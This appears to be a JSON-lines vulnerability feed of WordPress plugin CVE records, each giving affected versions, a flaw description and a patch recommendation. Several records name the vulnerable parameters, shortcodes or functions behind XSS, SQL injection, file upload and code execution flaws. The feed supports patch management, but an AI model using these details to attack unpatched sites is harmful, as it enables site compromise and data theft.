{"CVE_ID":"CVE-2023-45640","slug":"wp-ulike","versionImpact":"4.6.8","versionEndExcluding":"4.6.9","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in TechnoWich WP ULike \u2013 Most Advanced WordPress Marketing Toolkit plugin <=\u00a04.6.8 versions.","recommendation":"Update to version 4.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-ulike\\\/wordpress-wp-ulike-plugin-4-6-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-ulike\\\/wordpress-wp-ulike-plugin-4-6-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7772","slug":"jupiterx-core","versionImpact":"4.6.5","versionEndExcluding":"4.6.6","description":"The Jupiter X Core plugin for WordPress is vulnerable to arbitrary file uploads due to a mishandled file type validation in the 'validate' function in all versions up to, and including, 4.6.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 4.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b546d24-82c1-4598-8926-6e73a4784b38?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b546d24-82c1-4598-8926-6e73a4784b38?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/ajax-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/ajax-handler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139412\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139412\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36841","slug":"woocommerce-smart-coupons","versionEndExcluding":"4.6.5","description":"The WooCommerce Smart Coupons plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the woocommerce_coupon_admin_init function in versions up to, and including, 4.6.0. This makes it possible for unauthenticated attackers to send themselves gift certificates of any value, which could be redeemed for products sold on the victim\u2019s storefront.","recommendation":"Update to version 4.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eeeb03f7-5f78-4462-b0b4-5080bbc419a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eeeb03f7-5f78-4462-b0b4-5080bbc419a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/03\\\/coupon-creation-vulnerability-patched-in-woocommerce-smart-coupons\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/03\\\/coupon-creation-vulnerability-patched-in-woocommerce-smart-coupons\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4447","slug":"essential-addons-for-elementor-lite","versionImpact":"4.6.4","versionEndExcluding":"4.6.5","description":"The Essential Addons for Elementor plugin for WordPress is vulnerable to privilege escalation in versions up to and including 4.6.4 due to a lack of restrictions on who can add a registration form and a custom registration role to an Elementor created page. This makes it possible for attackers with access to the Elementor page builder to create a new registration form that defaults to the user role being set to administrator and subsequently register as an administrative user.","recommendation":"Update to version 4.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be098ee9-b749-4908-85e8-e717d019609a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be098ee9-b749-4908-85e8-e717d019609a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2526471%40essential-addons-for-elementor-lite&new=2526471%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2526471%40essential-addons-for-elementor-lite&new=2526471%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4446","slug":"essential-addons-for-elementor-lite","versionImpact":"4.6.4","versionEndExcluding":"4.6.5","description":"The Essential Addons for Elementor plugin for WordPress is vulnerable to authorization bypass in versions up to and including 4.6.4 due to missing capability checks and nonce disclosure. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to perform many unauthorized actions such as changing settings and installing arbitrary plugins.","recommendation":"Update to version 4.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/283fb581-8b61-4008-a5c4-2e1490fab33e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/283fb581-8b61-4008-a5c4-2e1490fab33e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2526471%40essential-addons-for-elementor-lite&new=2526471%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2526471%40essential-addons-for-elementor-lite&new=2526471%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34013","slug":"poll-maker","versionEndExcluding":"4.6.3","description":"Server-Side Request Forgery (SSRF) vulnerability in Poll Maker Team Poll Maker \u2013 Best WordPress Poll Plugin. This issue affects Poll Maker \u2013 Best WordPress Poll Plugin: from n\/a through 4.6.2.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/poll-maker\\\/wordpress-poll-maker-plugin-4-6-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/poll-maker\\\/wordpress-poll-maker-plugin-4-6-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4594","slug":"tournamatch","versionImpact":"4.6.1","versionEndExcluding":"4.6.2","description":"The Tournamatch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'trn-ladder-registration-button' shortcode in all versions up to, and including, 4.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tournamatch\\\/tags\\\/4.6.1\\\/includes\\\/shortcodes\\\/class-shortcodes.php#L273\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tournamatch\\\/tags\\\/4.6.1\\\/includes\\\/shortcodes\\\/class-shortcodes.php#L273\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3295681\\\/tournamatch\\\/trunk\\\/includes\\\/shortcodes\\\/class-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3295681\\\/tournamatch\\\/trunk\\\/includes\\\/shortcodes\\\/class-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc912831-bbdd-4f8f-a620-47e41b1b731d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc912831-bbdd-4f8f-a620-47e41b1b731d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2386","slug":"wp-google-map-plugin","versionImpact":"4.6.1","versionEndExcluding":"4.6.2","description":"The WordPress Plugin for Google Maps \u2013 WP MAPS plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter of the 'put_wpgm' shortcode in all versions up to, and including, 4.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f0deb68-3caf-4ad6-977e-0e954d29e6b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f0deb68-3caf-4ad6-977e-0e954d29e6b7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108077\\\/wp-google-map-plugin\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108077\\\/wp-google-map-plugin\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4672","slug":"wordpress-simple-paypal-shopping-cart","versionEndExcluding":"4.6.2","description":"The WordPress Simple Shopping Cart WordPress plugin before 4.6.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6500271f-9d1c-40ed-be58-a6cea8d1110d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6500271f-9d1c-40ed-be58-a6cea8d1110d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5939","slug":"buddypress-media","versionImpact":"4.6.15","versionEndExcluding":"4.6.16","description":"The rtMedia for WordPress, BuddyPress and bbPress WordPress plugin before 4.6.16 loads the contents of the import file in an unsafe manner, leading to remote code execution by privileged users.","recommendation":"Update to version 4.6.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db5d41fc-bcd3-414f-aa99-54d5537007bc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db5d41fc-bcd3-414f-aa99-54d5537007bc\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5931","slug":"buddypress-media","versionImpact":"4.6.15","versionEndExcluding":"4.6.16","description":"The rtMedia for WordPress, BuddyPress and bbPress WordPress plugin before 4.6.16 does not validate files to be uploaded, which could allow attackers with a low-privilege account (e.g. subscribers) to upload arbitrary files such as PHP on the server","recommendation":"Update to version 4.6.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d6889e3-a01b-4e7f-868f-af7cc8c7531a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d6889e3-a01b-4e7f-868f-af7cc8c7531a\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-41951","slug":"buddypress-media","versionImpact":"4.6.14","versionEndExcluding":"4.6.15","description":"Missing Authorization vulnerability in rtCamp rtMedia for WordPress, BuddyPress and bbPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects rtMedia for WordPress, BuddyPress and bbPress: from n\/a through 4.6.14.","recommendation":"Update to version 4.6.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/buddypress-media\\\/vulnerability\\\/wordpress-rtmedia-for-wordpress-buddypress-and-bbpress-plugin-4-6-14-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/buddypress-media\\\/vulnerability\\\/wordpress-rtmedia-for-wordpress-buddypress-and-bbpress-plugin-4-6-14-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2695","slug":"shariff","versionImpact":"4.6.13","versionEndExcluding":"4.6.14","description":"The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shariff' shortcode in all versions up to, and including, 4.6.13 due to insufficient input sanitization and output escaping on user supplied attributes such as 'borderradius' and 'timestamp'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.6.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9baa8bbf-a318-4bc5-8bfd-2bd64536965e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9baa8bbf-a318-4bc5-8bfd-2bd64536965e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069111%40shariff%2Ftrunk&old=3061040%40shariff%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069111%40shariff%2Ftrunk&old=3061040%40shariff%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4098","slug":"shariff","versionImpact":"4.6.13","versionEndExcluding":"4.6.14","description":"The Shariff Wrapper plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 4.6.13 via the shariff3uu_fetch_sharecounts function. This allows unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 4.6.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f49fba00-c576-4a1a-8b0b-9ebed3e3d090?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f49fba00-c576-4a1a-8b0b-9ebed3e3d090?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shariff\\\/trunk\\\/shariff.php#L410\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shariff\\\/trunk\\\/shariff.php#L410\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103137\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6386","slug":"sitepress-multilingual-cms","versionImpact":"4.6.12","versionEndExcluding":"4.6.13","description":"The WPML plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.6.12 via the Twig Server-Side Template Injection. This is due to missing input validation and sanitization on the render function. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.","recommendation":"Update to version 4.6.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7fc91cc-e529-4362-8269-bf7ee0766e1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7fc91cc-e529-4362-8269-bf7ee0766e1e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpml.org\\\/\",\"name\":\"https:\\\/\\\/wpml.org\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/sec.stealthcopter.com\\\/wpml-rce-via-twig-ssti\\\/\",\"name\":\"https:\\\/\\\/sec.stealthcopter.com\\\/wpml-rce-via-twig-ssti\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1106","slug":"shariff","versionEndExcluding":"4.6.10","description":"The Shariff Wrapper WordPress plugin before 4.6.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0672f8af-33e2-459c-ac8a-7351247a8a26\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0672f8af-33e2-459c-ac8a-7351247a8a26\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3554","slug":"all-in-one-seo-pack","versionImpact":"4.6.0","versionEndExcluding":"4.6.1.1","description":"The All in One SEO \u2013 Best WordPress SEO Plugin \u2013 Easily Improve SEO Rankings & Increase Traffic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.6.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28741ffc-4ff5-4e67-a183-bb5064b6752e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28741ffc-4ff5-4e67-a183-bb5064b6752e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3073370%40all-in-one-seo-pack%2Ftrunk&old=3064696%40all-in-one-seo-pack%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3073370%40all-in-one-seo-pack%2Ftrunk&old=3064696%40all-in-one-seo-pack%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3368","slug":"all-in-one-seo-pack","versionImpact":"4.6.0","versionEndExcluding":"4.6.1.1","description":"The All in One SEO  WordPress plugin before 4.6.1.1 does not validate and escape some of its Post fields before outputting them back, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 4.6.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab78b1a5-e28c-406b-baaf-6d53017f9328\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab78b1a5-e28c-406b-baaf-6d53017f9328\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3175","slug":"chatbot","versionEndExcluding":"4.6.1","description":"The AI ChatBot WordPress plugin before 4.6.1 does not adequately escape some settings, allowing high-privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7643980b-eaa2-45d1-bd9d-9afae0943f43\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7643980b-eaa2-45d1-bd9d-9afae0943f43\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6813","slug":"auth0","versionImpact":"4.6.0","versionEndExcluding":"4.6.1","description":"The Login by Auth0 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018wle\u2019 parameter in all versions up to, and including, 4.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c4e0d48-fde1-45dd-8e06-4582cf677579?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c4e0d48-fde1-45dd-8e06-4582cf677579?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3114611%40auth0&new=3114611%40auth0&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3114611%40auth0&new=3114611%40auth0&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5644","slug":"tournamatch","versionImpact":"4.6.0","versionEndExcluding":"4.6.1","description":"The Tournamatch WordPress plugin before 4.6.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/afe14c7a-95b2-4d3f-901a-e53ecef70d49\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/afe14c7a-95b2-4d3f-901a-e53ecef70d49\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5627","slug":"tournamatch","versionImpact":"4.6.0","versionEndExcluding":"4.6.1","description":"The Tournamatch WordPress plugin before 4.6.1 does not sanitise and escape some parameters, which could allow users with a role as low as subscriber to perform Cross-Site Scripting attacks.","recommendation":"Update to version 4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b18dc3d-0d5f-44e9-b22f-48ea0a9c9193\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b18dc3d-0d5f-44e9-b22f-48ea0a9c9193\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8620","slug":"give","versionImpact":"4.6.0","versionEndExcluding":"4.6.1","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 4.6.0. This makes it possible for unauthenticated attackers to extract donor names, emails, and donor id.","recommendation":"Update to version 4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/impress-org\\\/givewp\\\/issues\\\/8042\",\"name\":\"https:\\\/\\\/github.com\\\/impress-org\\\/givewp\\\/issues\\\/8042\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336253%40give&new=3336253%40give&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336253%40give&new=3336253%40give&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.linkedin.com\\\/posts\\\/givewp_givewp-support-handpicked-from-the-best-activity-7356319738290974720-Dt4U\\\/?utm_source=share&utm_medium=member_desktop&rcm=ACoAABmBk5UBxPIzCp0cgsD1_1xKASTMphetnI4\",\"name\":\"https:\\\/\\\/www.linkedin.com\\\/posts\\\/givewp_givewp-support-handpicked-from-the-best-activity-7356319738290974720-Dt4U\\\/?utm_source=share&utm_medium=member_desktop&rcm=ACoAABmBk5UBxPIzCp0cgsD1_1xKASTMphetnI4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc7c5a6-513e-4aa8-9538-0ac6fb37c867?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc7c5a6-513e-4aa8-9538-0ac6fb37c867?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12308","slug":"logo-slider-wp","versionImpact":"4.5.0","versionEndExcluding":"4.6.0","description":"The Logo Slider  WordPress plugin before 4.6.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 4.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa82ada7-357b-4f01-a0d6-ff633b188a80\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa82ada7-357b-4f01-a0d6-ff633b188a80\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7205","slug":"give","versionImpact":"4.5.0","versionEndExcluding":"4.6.0","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the donor notes parameter in all versions up to, and including, 4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with GiveWP worker-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Additionally, they need to trick an administrator into visiting the legacy version of the site.","recommendation":"Update to version 4.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/REST\\\/V3\\\/Routes\\\/Donors\\\/DonorNotesController.php#51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/REST\\\/V3\\\/Routes\\\/Donors\\\/DonorNotesController.php#51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333090\\\/give\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333090\\\/give\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e501d8-88a0-4625-aeb0-aa33fc89a8d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e501d8-88a0-4625-aeb0-aa33fc89a8d4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1076","slug":"ssl-zen","versionImpact":"4.5.0","versionEndExcluding":"4.6.0","description":"The SSL Zen  WordPress plugin before 4.6.0 only relies on the use of .htaccess to prevent visitors from accessing the site's generated private keys, which allows an attacker to read them if the site runs on a server who doesn't support .htaccess files, like NGINX.","recommendation":"Update to version 4.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c3e9c72-3d6c-4e2c-bb8a-f4efce1371d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c3e9c72-3d6c-4e2c-bb8a-f4efce1371d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3118","slug":"export-all-urls","versionEndExcluding":"4.6","description":"The Export All URLs WordPress plugin before 4.6 does not sanitise and escape a parameter before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a9efc8d-561a-42c6-8e61-ae5c3be581ea\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a9efc8d-561a-42c6-8e61-ae5c3be581ea\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4270","slug":"woo-min-max-quantity-step-control-single","versionEndExcluding":"4.6","description":"The Min Max Control WordPress plugin before 4.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04560bf1-676b-46fb-9344-4150862f2686\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04560bf1-676b-46fb-9344-4150862f2686\",\"refsource\":\"MISC\",\"tags\":[]}]"}
